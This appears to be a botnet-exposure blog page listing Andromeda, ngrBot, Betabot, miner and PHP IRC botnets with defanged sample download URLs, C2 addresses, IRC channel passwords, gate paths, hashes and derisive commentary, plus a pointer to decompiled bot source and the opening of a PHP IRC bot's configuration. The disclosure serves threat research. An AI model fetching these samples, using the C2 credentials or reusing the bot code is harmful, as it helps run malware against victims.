Found this sample and decompiled so have fun with the source wich is partially encrypted. Here the sample: hxxp://93.57.18.211/bot.exe And here the source decompiled and partially encrypted with BitXOR password for the link is : exposedbotnets
voscomptesenligne.eu(Andromeda Bot hosted in Netherlands International Widespread Services Limited)
Sample found by ALiSs urls’s: hxxp://voscomptesenligne.eu/joomla/image.php hxxp://www.curboc.com/joomla/image.php Plugins: hxxp://voscomptesenligne.eu/joomla/f.pack hxxp://voscomptesenligne.eu/joomla/s.pack hxxp://voscomptesenligne.eu/joomla/r.pack hxxp://www.curboc.com /joomla/f.pack hxxp://www.curboc.com /joomla/s.pack hxxp://www.curboc.com /joomla/r.pack hxxp://voscomptesenligne.eu/joomla/fg.php?id=1880376902 Love Poem dedicated to Brian Krebs here: hxxp://voscomptesenligne.eu/ Same Poem here : hxxp://www.curboc.com Samples: hxxp://91.223.82.147/andro.exe hxxp://www.curboc.com/andro.exe hxxp://www.curboc.com/miner.exe hxxp://voscomptesenligne.eu/miner.exe miner.exe downloads: hxxp://93.113.171.18/upl/pYofXDkAVERHbkeo/m.jpg (www.fisier.ro) hosting infos: http://whois.domaintools.com/91.223.82.179
178.86.23.225(ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)
Botnet found by rolls Server: 178.86.23.225:1875 Server Password: Username: uiswnri Nickname: n{DE|XPa}uiswnri Channel: #moon (Password: 4m3r1k) Channeltopic: :.up hxxp://wachalol.com/images/180713.exe b2790c7513a2efbf7cb34f64c4f49ff0 Inactive domain :harlan10.com hosting infos: http://whois.domaintools.com/178.86.23.225
smokelessbooter.tk (Betabot http botnet hosted by ecatel.net)
Resolved smokelessbooter.tk to 94.102.51.123 Server: smokelessbooter.tk Gate file: /bronk/order.php Alternate domains: watchonlinecams.comssh-products.comfudfiles.comtheprofitnet.com1337hackers.comcash-networks.com We have a real HF hecker here folks. I can see a Java “driveby” site, shitty crypter site, shitty CPA network site and a shitty hackforums clone site just from the domain names. Looks like he’s running a shitty hosting company as well:Read more...
bigtoys.pw (Betabot http botnet hosted by namecheap.com)
Resolved bigtoys.pw to 198.187.28.72 Server: bigtoys.pw Gate file: /b/order.php Alternative domain: smalltoys.pw I wonder who this could belong to? Name Server:NS2.HOSTING-MARVID.ME Name Server:NS1.HOSTING-MARVID.ME An idiot, obviously Related md5s (search on malwr.com to download the samples): Betabot: 2662af32e5d58d471bd16dc3202db284 Hosting infos: http://whois.domaintools.com/198.187.28.72
us.eclipsemc.com(BitCoin Miner hosted in United States Independence Host Metro)
Sample: hxxp://darknode.net/Mining.exe coin-miner.exe” -a sha256 -o hxxp://brucegregory_bot:x@us.eclipsemc.com:8337 -T 83 -l yes -t 1 hosting infos: http://whois.domaintools.com/67.14.164.114
37.221.170.195(PHP Bots hosted in Germany Frankfurt Am MainVoxility S.r.l.)
Found by Yewnix <? set_time_limit(0); error_reporting(0); class Anxiety { var $config = array("server"=>"37.221.170.195", // Server IP Address "port"=>443, "pass"=>"", // Server Password "prefix"=>"[r00t]-", "maxrand"=>3, "chan"=>"#exploit", // Channel "key"=>"lolmoney", // Channel Key "modes"=>"+p", "password"=>"lolmoney", // Bot Password "trigger"=>".", "hostauth"=>"anxiety.gov" // * For Any Hostname //Leave all of this shit down here alone, unless you know whatRead more...